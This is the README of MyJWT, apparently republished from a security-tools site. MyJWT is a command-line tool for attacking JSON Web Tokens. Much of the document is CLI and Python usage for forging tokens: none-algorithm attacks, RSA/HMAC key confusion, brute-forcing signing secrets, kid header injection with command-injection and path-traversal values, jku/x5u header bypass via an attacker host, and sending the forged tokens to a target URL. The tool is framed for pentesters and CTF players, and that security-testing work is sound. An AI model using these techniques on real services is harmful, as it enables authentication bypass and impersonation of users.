-->

MyJWT - A Cli For Cracking, Testing Vulnerabilities On Json Web Token (JWT)


This cli is for pentesters, CTF players, or dev.
You can modify your jwt, sign, inject ,etc...
Check Documentation for more information.
If you see problems or enhancement send an issue.I will respond as soon as possible. Enjoy :)


Documentation

Documentation is available at http://myjwt.readthedocs.io


Features
  • copy new jwt to clipboard
  • user Interface (thanks questionary)
  • color output
  • modify jwt (header/Payload)
  • None Vulnerability
  • RSA/HMAC confusion
  • Sign a jwt with key
  • Brute Force to guess key
  • crack jwt with regex to guess key
  • kid injection
  • Jku Bypass
  • X5u Bypass

Installation

To install myjwt, simply use pip:

pip install myjwt

To run mywt from a docker image, run:

docker run -it docker.pkg.github.com/mbouamama/myjwt/myjwt:latest myjwt# mount volume for wordlistdocker run -v $(pwd)/wordlist:/home/wordlist/  -it docker.pkg.github.com/mbouamama/myjwt/myjwt:latest myjwt# On Windowsdocker run -v %CD%/wordlist:/home/wordlist/  -it docker.pkg.github.com/mbouamama/myjwt/myjwt:latest myjwt

To install myjwt, on git:

git clone https://github.com/mBouamama/MyJWT.gitcd ./MyJWTpip install -r requirements.txtpython MyJWT/myjwt_cli.py --help

To install myjwt on BlackArch:

pacman -S myjwt

Usage
$ myjwt --helpUsage: myjwt [OPTIONS] JWT  This cli is for pentesters, CTF players, or dev.  You can modify your jwt, sign, inject ,etc...  Full documentation is at http://myjwt.readthedocs.io.  If you see problems or enhancement send an issue.I will respond as soon as possible.  Enjoy :)  All new jwt will be copy to the clipboard.Options:  --version                    Show the version and exit.  --full-payload TEXT          New payload for your jwt.Json format Required.  -h, --add-header TEXT        Add a new key, value to your jwt header, if key                               is present old value will be replaced.Format:                               key=value.  -p, --add-payload TEXT       Add a new key, value to your jwt payload, if                               key is present old value    will be                               replaced.Format: key=value.  --sign TEXT                  Sign Your jwt with key given.  --verify TEXT                verify your key.  -none, --none-vulnerability  Check None Alg vulnerability.  --hmac PATH                  Check RS/HMAC Alg vulnerability.  --bruteforce PATH            Bruteforce to guess the secret used to sign the                               token.  -c, --crack TEXT             regex to iterate all string possibilities to                               guess the secret used to sign the token.  --kid TEXT                   Kid Injection sql  --jku TEXT                   Jku Header to bypass authentication  --x5u TEXT                   X5u Header to bypass authen   tication  --crt TEXT                   For x5cHeader, force crt file  --key TEXT                   For jku or x5c Header, force private key to                               your key file  --file TEXT                  For jku Header and x5u Header, force file name  --print                      Print Decoded JWT  -u, --url TEXT               Url to send your jwt.  -m, --method TEXT            Method use for send request to url.(Default                               GET).  -d, --data TEXT              Data send to your url.Format: key=value. if                               value = MY_JWT value will be replace by new                               jwt.  -c, --cookies TEXT           Cookies to send to your url.Format: key=value.                               if value = MY_JWT value will be replace by new                                  jwt.  --help                       Show this message and exit.

Modify JWT
Option Type Example help
--ful-payload JSON {"user": "admin"} New payload for your jwt.
-h, --add-header key=value user=admin Add a new key, value to your jwt header, if key is present old value will be replaced.
-p, --add-payload key=value user=admin Add a new key, value to your jwt payload, if key is present old value will be replaced.

Check Your JWT (HS alg)
Option Type Example help
--sign text mysecretkey Sign Your jwt with your key
--verify text mysecretkey Verify your key.

Exploit
Option Type Example help
-none, --none-vulnerability Nothing Check None Alg vulnerability.
--hmac PATH ./public.pem Check RS/HMAC Alg vulnerability, and sign your jwt with public key.
--bruteforce PATH ./wordlist/big.txt Bruteforce to guess th secret used to sign the token. Use txt file with all password stored(1 by line)
--crack REGEX "[a-z]{4}" regex to iterate all string possibilities to guess the secret used to sign the token.
--kid text "00; echo /etc/.passwd" Kid Injection sql
--jku text MYPUBLICIP Jku Header to bypass authentication, use --file if you want to change your jwks file name, and --key if you want to use your own private pem
--x5u text MYPUBLICIP For jku or x5c Header, use --file if you want to change your jwks file name, and --key if you want to use your own private pem

Send your jwt
Option Type Example help
-u, --url url http://challenge01.root-me.org/web-serveur/ch59/admin Url to send your jwt.
-m, --method text POST Method use to send request to url.(Default: GET).
-d, --data key=value secret=MY_JWT Data send to your url.Format: key=value. if value = MY_JWT value will be replace by your new jwt.
-c, --cookies key=value secret=MY_JWT Cookies to send to your url.Format: key=value.if value = MY_JWT value will be replace by your new jwt.

Other
Option Type Example help
--crt PATH ./public.crt For x5cHeader, force crt file
--key PATH ./private.pem For jku or x5c Header, force private key to your key file
--file text myfile For jku Header, force file name without .json extension
--print Nothing Print Decoded JWT
--help Nothing Show Helper message and exit.
--version Nothing Show Myjwt version

Examples

Modify your Jwt

CLI
myjwt YOUR_JWT --add-payload "username=admin" --add-header "refresh=false"

Code
from myjwt.modify_jwt import add_header, change_payloadfrom myjwt.utils import jwt_to_json, SIGNATURE, encode_jwtjwt_json = jwt_to_json(jwt)jwt_json = add_header(jwt_json, {"kid": "001"})jwt_json = change_payload(jwt_json, {"username": "admin"})jwt = encode_jwt(jwt_json) + "." + jwt_json[SIGNATURE]

Full example here: 01-modify-jwt


None Vulnerability

CLI
myjwt YOUR_JWT --none-vulnerability

CODE
from myjwt.utils import jwt_to_json, SIGNATURE, encode_jwtfrom myjwt.vulnerabilities import none_vulnerabilityjwt_json = jwt_to_json(jwt)jwt = none_vulnerability(encode_jwt(jwt_json) + "." + jwt_json[SIGNATURE])

Full example here: 02-none-vulnerability


Sign Key

CLI
myjwt YOUR_JWT --sign YOUR_KEY

CODE
from myjwt.modify_jwt import signaturefrom myjwt.utils import jwt_to_jsonkey = "test"jwt = signature(jwt_to_json(jwt), key)

Full example here: 03-sign-key


Brute Force

CLI
myjwt YOUR_JWT --bruteforce PATH

CODE
from myjwt.vulnerabilities import bruteforce_wordlistwordlist = "../../wordlist/common_pass.txt"key = bruteforce_wordlist(jwt, wordlist)

Full example here: 04-brute-force


Crack

CLI
myjwt YOUR_JWT --crack REGEX

RSA/HMAC Confusion

CLI
myjwt YOUR_JWT --hmac FILE

CODE
from myjwt.vulnerabilities import confusion_rsa_hmacfile = "public.pem"jwt = confusion_rsa_hmac(jwt, file)

Full example here: 05-rsa-hmac-confusion


Kid Injection

CLI
myjwt YOUR_JWT --kid INJECTION

Code
from myjwt.modify_jwt import signaturefrom myjwt.utils import jwt_to_jsonfrom myjwt.vulnerabilities import inject_sql_kidinjection = "../../../../../../dev/null"sign = ""jwt = inject_sql_kid(jwt, injection)jwt = signature(jwt_to_json(jwt), sign)

Full example here: 06-kid-injection


Send your new Jwt to url

CLI
myjwt YOUR_JWT -u YOUR_URL -c "jwt=MY_JWT" --non-vulnerability --add-payload "username=admin"

Jku Vulnerability

CLI
myjwt YOUR_JWT --jku YOUR_URL

Code
from myjwt.vulnerabilities import jku_vulnerabilitynew_jwt = jku_vulnerability(jwt=jwt, url="MYPUBLIC_IP")print(jwt)

Full example here: 07-jku-bypass


X5U Vulnerability

CLI
myjwt YOUR_JWT --x5u YOUR_URL

Code
from myjwt.vulnerabilities import x5u_vulnerabilitynewJwt = x5u_vulnerability(jwt=jwt, url="MYPUBLIC_IP")print(jwt)

Full example here: 08-x5u-bypass


Download

Check github releases. Latest is available at https://github.com/mBouamama/MyJWT/releases/latest


Contribute
  • Fork this repository or clone it
  • Create a new branch (feature, hotfix, etc...)
  • Make necessary changes and commit those changes
  • Check lint with make flake8
  • Check unit_test with make test
  • Send Pull Request I will check as Soon as Possible.

Change log

The log's become rather long. It moved to its own file.

See CHANGES.



Disqus Comments